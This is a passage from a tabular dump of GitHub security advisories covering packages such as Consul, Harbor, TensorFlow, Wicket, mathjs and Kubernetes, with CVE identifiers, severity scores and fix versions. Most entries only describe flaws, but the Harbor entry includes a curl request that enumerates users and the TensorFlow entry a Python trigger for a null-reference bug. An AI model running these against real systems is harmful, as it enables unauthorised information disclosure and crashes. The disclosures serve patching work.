'github_reviewed_at': '2021-05-24T12:53:07Z', 'nvd_published_at': '2020-09-24T17:15:00Z'}" +1.4.0,GHSA-rqjq-mrgx-85hp,2021-07-29T18:19:34Z,2021-05-18T18:21:35Z,,['CVE-2020-13250'],Allocation of Resources Without Limits or Throttling in Hashicorp Consul,HashiCorp Consul and Consul Enterprise include an HTTP API (introduced in 1.2.0) and DNS (introduced in 1.4.3) caching feature that was vulnerable to denial of service. Fixed in 1.6.6 and 1.7.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul/agent/config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.6.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul/agent/config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.7.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13250'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/pull/8023'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/commit/72f92ae7ca4cabc1dc3069362a9b64ef46941432'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/blob/v1.6.6/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/blob/v1.7.4/CHANGELOG.md'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T22:00:34Z', 'nvd_published_at': '2020-06-11T20:15:00Z'}" +1.4.0,GHSA-xg2h-wx96-xgxr,2022-06-29T12:33:51Z,2021-05-21T16:26:06Z,,[],RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be,"### Impact + +A security-sensitive bug was discovered by Open Source Developer *Erik Sundell of Sundell Open Source Consulting AB*. + +The functions `RandomAlphaNumeric(int)` and `CryptoRandomAlphaNumeric(int)` are not as random as they should be. Small values of `int` in the functions above will return a smaller subset of results than they should. For example, `RandomAlphaNumeric(1)` will always return a digit in the 0-9 range, while `RandomAlphaNumeric(4)` will return around ~7 million of the ~13M possible permutations. + +This is considered a security release because programs that rely upon random generators for passwords are at an increased risk of brute force-style password guessing. There is also a higher probability of collision. + +The problem was the result of a mistaken regular expression that only accepted random strings if they contained a digit from `[0-9]`. That restriction has been removed. + +### Patches + +This issue has been corrected in v1.1.1. + +### Workarounds + +If you cannot upgrade to v1.1.1, you can work around the issue by calling `RandomAlphaNumericCustom(N, true, true)`|`CryptoRandomAlphaNumericCustom(N, true, true)` instead. (Where `N` is the desired length, and `true` is the literal boolean `true`.) ",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/Masterminds/goutils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Masterminds/goutils/security/advisories/GHSA-xg2h-wx96-xgxr'}, {'type': 'WEB', 'url': 'https://github.com/Masterminds/goutils/commit/f1923532a168b8203bfe956d8cd3b17ebece5982'}, {'type': 'WEB', 'url': 'https://github.com/Masterminds/goutils/releases/tag/v1.1.1'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T14:36:56Z', 'nvd_published_at': None}" +1.4.0,GHSA-77gc-fj98-665h,2023-08-30T10:22:12Z,2021-05-18T19:15:09Z,,['CVE-2016-9122'],Go JOSE Signature Validation Bypass,"Go JOSE before 1.1.0 suffers from multiple signatures exploitation. The go-jose library supports messages with multiple signatures. However, when validating a signed message the API did not indicate which signature was valid, which could potentially lead to confusion. For example, users of the library might mistakenly read protected header values from an attached signature that was different from the one originally validated","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'gopkg.in/square/go-jose.v1'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-9122'}, {'type': 'WEB', 'url': 'https://github.com/square/go-jose/pull/111'}, {'type': 'WEB', 'url': 'https://github.com/square/go-jose/commit/2c5656adca9909843c4ff50acf1d2cf8f32da7e6'}, {'type': 'WEB', 'url': 'https://github.com/square/go-jose/commit/789a4c4bd4c118f7564954f441b29c153ccd6a96'}, {'type': 'WEB', 'url': 'https://github.com/square/go-jose/commit/c7581939a3656bb65e89d64da0a52364a33d2507'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/169629'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2016/11/03/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2016/11/03/1'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T18:06:40Z', 'nvd_published_at': None}" +1.4.0,GHSA-q9p8-33wc-h432,2022-10-05T17:58:07Z,2021-05-24T16:58:06Z,,['CVE-2020-13794'],Authenticated users can exploit an enumeration vulnerability in Harbor,"### **Impact** + +Hidde Smit from Cyber Eagle has discovered an User Enumeration flaw in Harbor. The issue is present in the ""/users"" api endpoint. This endpoint is supposed to be restricted to administrators. This restriction is able to be bypassed and information can be obtained via the ""search"" functionality. + +Non-administrator users (such as those created via self-registration) can list all usernames and user IDs by sending a GET request to /api/users/search with parameter ""username"" and value ""_"", as follows: + +`curl -X GET ""https:///api/users/search?username=_"" -H ""accept: application/json"" --user :` + +The vulnerability was immediately fixed by the Harbor team and all supported versions were patched. With the patched versions of Harbor, the username is required for search and we have removed the support for querying by email. + +### **Patches** +If your product uses the affected releases of Harbor, update to either version 2.1.0 or 2.0.3 to fix this issue immediately + +https://github.com/goharbor/harbor/releases/tag/v2.1.0 +https://github.com/goharbor/harbor/releases/tag/v2.0.3 + +### **Workarounds** +There is no workaround for this issue + +### **For more information** +If you have any questions or comments about this advisory, contact cncf-harbor-security@lists.cncf.io +View our security policy at https://github.com/goharbor/harbor/security/policy +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13794","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/goharbor/harbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/goharbor/harbor/src/core/api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '2.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/security/advisories/GHSA-q9p8-33wc-h432'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13794'}, {'type': 'PACKAGE', 'url': 'https://github.com/goharbor/harbor'}, {'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/releases'}, {'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/releases/tag/v2.0.3'}, {'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/releases/tag/v2.1.0'}, {'type': 'WEB', 'url': 'https://www.cybereagle.io/blog/cve-2020-13794/'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T12:51:00Z', 'nvd_published_at': '2020-09-30T18:15:00Z'}" +1.4.0,GHSA-4p4p-www8-8fv9,2021-05-18T19:11:12Z,2021-05-21T14:25:19Z,,['CVE-2021-29568'],Reference binding to null in `ParameterizedTruncatedNormal`,"### Impact +An attacker can trigger undefined behavior by binding to null pointer in `tf.raw_ops.ParameterizedTruncatedNormal`: + +```python +import tensorflow as tf + +shape = tf.constant([], shape=[0], dtype=tf.int32) +means = tf.constant((1), dtype=tf.float32) +stdevs = tf.constant((1), dtype=tf.float32) +minvals = tf.constant((1), dtype=tf.float32) +maxvals = tf.constant((1), dtype=tf.float32) + +tf.raw_ops.ParameterizedTruncatedNormal( + shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/3f6fe4dfef6f57e768260b48166c27d148f3015f/tensorflow/core/kernels/parameterized_truncated_normal_op.cc#L630) does not validate input arguments before accessing the first element of `shape`: + +```cc +int32 num_batches = shape_tensor.flat()(0); +``` + +If `shape` argument is empty, then `shape_tensor.flat()` is an empty array. + +### Patches +We have patched the issue in GitHub commit [5e52ef5a461570cfb68f3bdbbebfe972cb4e0fd8](https://github.com/tensorflow/tensorflow/commit/5e52ef5a461570cfb68f3bdbbebfe972cb4e0fd8). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4p4p-www8-8fv9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29568'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/5e52ef5a461570cfb68f3bdbbebfe972cb4e0fd8'}]","{'cwe_ids': ['CWE-476', 'CWE-824'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T19:11:12Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-64gv-3pqv-299h,2021-05-05T22:31:00Z,2021-05-07T15:54:15Z,,['CVE-2020-11976'],Exposure of Sensitive Information to an Unauthorized Actor in Apache Wicket,"By crafting a special URL it is possible to make Wicket deliver unprocessed HTML templates. This would allow an attacker to see possibly sensitive information inside a HTML template that is usually removed during rendering. Affected are Apache Wicket versions 7.16.0, 8.8.0 and 9.0.0-M5","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.wicket:wicket-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.17.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.wicket:wicket-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.9.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.wicket:wicket-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M1'}, {'fixed': '9.0.0'}]}], 'versions': ['9.0.0-M1']}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.wicket:wicket-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M2'}, {'fixed': '9.0.0'}]}], 'versions': ['9.0.0-M2']}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.wicket:wicket-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M3'}, {'fixed': '9.0.0'}]}], 'versions': ['9.0.0-M3']}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.wicket:wicket-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M4'}, {'fixed': '9.0.0'}]}], 'versions': ['9.0.0-M4']}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.wicket:wicket-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M5'}, {'fixed': '9.0.0'}]}], 'versions': ['9.0.0-M5']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11976'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r05340178680eb6b9d4d40d56b5621dd4ae9715e6f41f12ae2288ec49@%3Cdev.directory.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r104eeefeb1e9da51f7ef79cef0f9ff12e21ef8559b77801e86b21e16%40%3Cusers.wicket.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r982c626dbce5c995223c4a6ddd7685de3592f8d65ba8372da1f3ce19@%3Cdev.directory.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0f36b83cc9f28b016ec552f023fb5a59a9ea8db56f2b9dcc6a2f6b7@%3Ccommits.directory.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd26cae6e30b205e09e4b511d3d962d4f677c0c604f737997ce1b2f22@%3Cdev.directory.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdec0a43afdca59c10416889e07267f3d2fdf4ab929a6e22a2659b6ff@%3Cdev.directory.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4af65851bf69605cfb68be215eba36d4cdc1a90b95fbc894799d923@%3Cdev.directory.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reb7ea8141c713b5b19eaf34c00f43aaebf5a1c116130f763c42bdad1@%3Cdev.directory.apache.org%3E'}]","{'cwe_ids': ['CWE-200', 'CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T22:31:00Z', 'nvd_published_at': '2020-08-11T19:15:00Z'}" +1.4.0,GHSA-jvf5-q4h5-2jmj,2021-05-05T21:41:45Z,2021-05-06T17:28:57Z,,['CVE-2020-7701'],Prototype Pollution in madlib-object-utils,madlib-object-utils before 0.1.7 is vulnerable to Prototype Pollution via setValue.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'madlib-object-utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7701'}, {'type': 'WEB', 'url': 'https://github.com/Qwerios/madlib-object-utils/commit/2a8d5be4fddfe46b69fbe25b9ebdff49a54481a8'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MADLIBOBJECTUTILS-598676'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T21:41:45Z', 'nvd_published_at': '2020-08-14T15:15:00Z'}" +1.4.0,GHSA-vcjf-mgcg-jxjq,2023-03-31T18:24:19Z,2021-05-07T16:32:17Z,,['CVE-2020-9281'],CKEditor 4.0 vulnerability in the HTML Data Processor,"A cross-site scripting (XSS) vulnerability in the HTML Data Processor for CKEditor 4.0 before 4.14.0 allows remote attackers to inject arbitrary web script through a crafted ""protected"" comment (with the cke_protected syntax).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ckeditor4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9281'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor4'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7OJ4BSS3VEAEXPNSOOUAXX6RDNECGZNO/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L322YA73LCV3TO7ORY45WQDAFJVNKXBE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M4HHYQ6N452XTCIROFMJOTYEUWSB6FR4/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-23T20:21:13Z', 'nvd_published_at': '2020-03-07T01:15:00Z'}" +1.4.0,GHSA-x2fc-mxcx-w4mf,2022-07-05T17:36:48Z,2021-05-10T18:39:04Z,,['CVE-2020-7743'],Prototype Pollution in mathjs,The package mathjs before 7.5.1 are vulnerable to Prototype Pollution via the deepExtend function that runs upon configuration updates.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'mathjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7743'}, {'type': 'WEB', 'url': 'https://github.com/josdejong/mathjs/commit/ecb80514e80bce4e6ec7e71db8ff79954f07c57e'}, {'type': 'WEB', 'url': 'https://github.com/josdejong/mathjs/blob/develop/HISTORY.md#2020-10-10-version-751'}, {'type': 'WEB', 'url': 'https://github.com/josdejong/mathjs/blob/develop/src/utils/object.js%23L82'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1017113'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1017112'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1017111'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MATHJS-1016401'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/mathjs'}]","{'cwe_ids': ['CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T19:47:53Z', 'nvd_published_at': '2020-10-13T10:15:00Z'}" +1.4.0,GHSA-hfg5-xpvw-c9x4,2021-09-01T19:36:12Z,2021-05-21T19:20:30Z,,['CVE-2020-11971'],Improper Input Validation in Apache Camel,Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel users should upgrade to 3.2.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.camel:camel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.camel:camel-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.camel:camel-management'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11971'}, {'type': 'WEB', 'url': 'https://github.com/apache/camel/commit/b954402272ddcfbb45dc1495520f920e70cc041c'}, {'type': 'WEB', 'url': 'https://camel.apache.org/security/CVE-2020-11971.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/camel'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/CAMEL-14811'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r16f4f9019840bc923e25d1b029fb42fe2676c4ba36e54824749a8da9@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3d0ae14ca224e69fb1c653f0a5d9e56370ee12d8896aa4490aeae14a@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r45da6abb42a9e6853ec8affdbf591f1db3e90c5288de9d3753124c79@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r52a5129df402352adc34d052bab9234c8ef63596306506a89fdc7328@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7968b5086e861da2cf635a7b215e465ce9912d5f16c683b8e56819c4@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8988311eb2481fd8a87e69cf17ffb8dc81bfeba5503021537f72db0a@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r938dc2ded68039ab747f6d7a12153862495d4b38107d3ed111994386@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9dc2505651788ac668299774d9e7af4dc616be2f56fdc684d1170882@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb0033c4e9dade1fdf22493314062364ff477e9a8b417f687dc168468@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc907a3d385a9c62416d686608e7241c864be8ef2ac16a3bdb0e33649@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/05/14/7'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T18:54:08Z', 'nvd_published_at': '2020-05-14T17:15:00Z'}" +1.4.0,GHSA-2jx2-76rc-2v7v,2023-09-18T19:38:35Z,2021-05-12T18:16:32Z,,['CVE-2017-1000056'],Kubernetes Privilege Escalation,Kubernetes version 1.5.0-1.5.4 is vulnerable to a privilege escalation in the PodSecurityPolicy admission plugin resulting in the ability to make use of any existing PodSecurityPolicy object.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000056'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/43459'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/commit/7fef0a4f6a44ea36f166c39fdade5324eff2dd5e'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/kubernetes'}]","{'cwe_ids': ['CWE-862'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2022-09-08T00:01:04Z', 'nvd_published_at': None}" +1.4.0,GHSA-25xm-hr59-7c27,2023-08-30T18:17:49Z,2021-05-25T18:39:37Z,,['CVE-2021-29482'],github.com/ulikunitz/xz fixes readUvarint denial of service,"### Impact + +xz is a compression and decompression library focusing on the xz format completely written in Go. The function readUvarint used to read the xz container format may not terminate a loop provide malicous input. + +### Patches + +The problem has been fixed in release v0.5.8. + +### Workarounds + +Limit the size of the compressed file input to a reasonable size for your use case. + +### References + +The standard library had recently the same issue and got the [CVE-2020-16845](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16845) allocated. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [xz](https://github.com/ulikunitz/xz/issues).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ulikunitz/xz'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ulikunitz/xz/security/advisories/GHSA-25xm-hr59-7c27'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29482'}, {'type': 'WEB', 'url': 'https://github.com/ulikunitz/xz/issues/35'}, {'type': 'WEB', 'url': 'https://github.com/ulikunitz/xz/commit/69c6093c7b2397b923acf82cb378f55ab2652b9b'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0016'}]","{'cwe_ids': ['CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T17:52:22Z', 'nvd_published_at': '2021-04-28T19:15:00Z'}" +1.4.0,GHSA-7c82-mp33-r854,2021-04-22T23:22:11Z,2021-05-07T16:47:54Z,,['CVE-2019-20921'],Cross-site scripting in bootstrap-select,bootstrap-select before 1.13.6 allows Cross-Site Scripting (XSS). It does not escape title values in OPTION elements. This may allow attackers to execute arbitrary JavaScript in a victim's browser.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bootstrap-select'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20921'}, {'type': 'WEB', 'url': 'https://github.com/snapappointments/bootstrap-select/issues/2199'}, {'type': 'WEB', 'url': 'https://github.com/snapappointments/bootstrap-select/commit/ab6e068748040cf3cda5859f6349b382402b8767'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-9r7h-6639-v5mw'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-BOOTSTRAPSELECT-570457'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1522'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-22T23:22:11Z', 'nvd_published_at': '2020-09-30T18:15:00Z'}" +1.4.0,GHSA-fp4w-jxhp-m23p,2021-08-31T21:03:58Z,2021-05-24T18:12:33Z,,['CVE-2020-36327'],Dependency Confusion in Bundler,"Bundler 1.16.0 through 2.2.9 and 2.2.11 through 